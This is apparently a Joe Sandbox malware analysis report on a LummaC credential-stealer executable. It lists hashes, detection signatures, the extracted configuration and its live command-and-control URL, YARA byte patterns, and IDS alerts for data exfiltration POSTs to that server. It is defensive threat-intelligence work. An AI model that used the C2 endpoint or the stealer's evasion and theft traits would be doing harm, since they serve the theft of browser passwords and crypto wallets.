Edit tour

Windows Analysis Report
OlZzqwjrwO.exe

Overview

General Information

Sample name:	OlZzqwjrwO.exe renamed because original name is a hash value
Original sample name:	0f9e80e70619e5bf0a9ef86008d8d90315463f2ca4ca224172aa2d42bae2734e.exe
Analysis ID:	1555043
MD5:	30ca3a9970c190d36ef5ab08d64406e6
SHA1:	fd44e251a898855a6c55e6fbd1eebbd807898052
SHA256:	0f9e80e70619e5bf0a9ef86008d8d90315463f2ca4ca224172aa2d42bae2734e
Tags:	94-158-244-69exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to hide a thread from the debugger

Delayed program exit found

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking computer name)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Enables driver privileges

Found evasive API chain (date check)

Found evasive API chain (may stop execution after accessing registry keys)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

OlZzqwjrwO.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\OlZzqwjrwO.exe" MD5: 30CA3A9970C190D36EF5AB08D64406E6)

WerFault.exe (PID: 4696 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_LummaCStealer_1	Yara detected LummaC Stealer	Joe Security
dump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1250:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1340247273.00000000008F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: OlZzqwjrwO.exe PID: 7712	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: OlZzqwjrwO.exe PID: 7712	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: OlZzqwjrwO.exe PID: 7712	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.OlZzqwjrwO.exe.8f0000.0.raw.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
0.2.OlZzqwjrwO.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
0.3.OlZzqwjrwO.exe.8f0000.0.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
0.2.OlZzqwjrwO.exe.400000.0.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T10:52:40.340723+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.9	49791	TCP
2024-11-13T10:53:17.926646+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.9	49976	TCP

ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T10:51:52.398965+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49873	94.158.244.69	80	TCP
2024-11-13T10:51:52.398965+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49978	94.158.244.69	80	TCP
2024-11-13T10:52:53.109411+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49822	94.158.244.69	80	TCP
2024-11-13T10:53:11.235764+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49923	94.158.244.69	80	TCP
2024-11-13T10:53:20.255878+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49974	94.158.244.69	80	TCP
2024-11-13T10:53:29.045691+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49977	94.158.244.69	80	TCP
2024-11-13T10:53:47.122818+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49979	94.158.244.69	80	TCP
2024-11-13T10:53:47.861590+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49980	94.158.244.69	80	TCP
2024-11-13T10:54:05.396672+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49981	94.158.244.69	80	TCP
2024-11-13T10:54:14.201356+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49982	94.158.244.69	80	TCP
2024-11-13T10:54:23.154328+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49983	94.158.244.69	80	TCP
2024-11-13T10:54:31.935365+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49984	94.158.244.69	80	TCP
2024-11-13T10:54:40.737248+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49985	94.158.244.69	80	TCP
2024-11-13T10:54:49.522715+0100	2043206	1	A Network Trojan was detected	192.168.2.9	49986	94.158.244.69	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T10:53:47.861590+0100	2843864	1	A Network Trojan was detected	192.168.2.9	49980	94.158.244.69	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}

Multi AV Scanner detection for submitted file

Source: OlZzqwjrwO.exe

ReversingLabs: Detection: 89%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: OlZzqwjrwO.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_004052D9 CryptUnprotectData,

0_2_004052D9

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Unpacked PE file: 0.2.OlZzqwjrwO.exe.400000.0.unpack

Source: OlZzqwjrwO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00451F08 FindFirstFileExW,	0_2_00451F08
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00451FBC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008D216F FindFirstFileExW,	0_2_008D216F
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008D2223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_008D2223

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49822 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49923 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49974 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49979 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49977 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49984 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49981 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49985 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49982 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49986 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49980 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49980 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49983 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49873 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49978 -> 94.158.244.69:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://94.158.244.69/c2sock

Source: Joe Sandbox View

IP Address: 94.158.244.69 94.158.244.69

Source: Joe Sandbox View

ASN Name: MIVOCLOUDMD MIVOCLOUDMD

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49976
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49791

Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69

Source: unknown

HTTP traffic detected: POST /c2sock HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: TeslaBrowser/5.5Content-Length: 16465Host: 94.158.244.69

Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/4NaI
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/79Wd
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/F
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/Jihk
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/PJf
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/ZuKk
Source: OlZzqwjrwO.exe, 00000000.00000002.3114597233.0000000003618000.00000004.00000020.00020000.00000000.sdmp, OlZzqwjrwO.exe, 00000000.00000002.3107144031.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sock
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sock&
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sock0LfNn/Fbj
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sockF
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sockS
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2socks4
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2socks~
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/i
Source: OlZzqwjrwO.exe, 00000000.00000002.3107144031.00000000009E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/nQ
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/tFkr
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/wbBA
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW,	0_2_0040B81C
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00422177 NtQueryInformationProcess,	0_2_00422177
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW,	0_2_0040A928
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose,	0_2_0040B129
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042F1C2 NtClose,	0_2_0042F1C2
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0041F9A4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004244E4 NtSetInformationThread,	0_2_004244E4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004224A3 NtQueryInformationProcess,	0_2_004224A3
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004245EC NtQuerySystemInformation,	0_2_004245EC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00421EEB NtQueryInformationProcess,	0_2_00421EEB
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040B7BB lstrcmpW,NtClose,	0_2_0040B7BB
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040B7F5 NtClose,	0_2_0040B7F5

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040B81C	0_2_0040B81C
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042C0DA	0_2_0042C0DA
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00434080	0_2_00434080
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040E14E	0_2_0040E14E
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040A928	0_2_0040A928
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040B129	0_2_0040B129
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042B9C5	0_2_0042B9C5
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004069A1	0_2_004069A1
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041F9A4	0_2_0041F9A4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041C270	0_2_0041C270
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042F278	0_2_0042F278
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040620B	0_2_0040620B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00430228	0_2_00430228
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004052D9	0_2_004052D9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00436ADC	0_2_00436ADC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00405AAA	0_2_00405AAA
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043B362	0_2_0043B362
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00402476	0_2_00402476
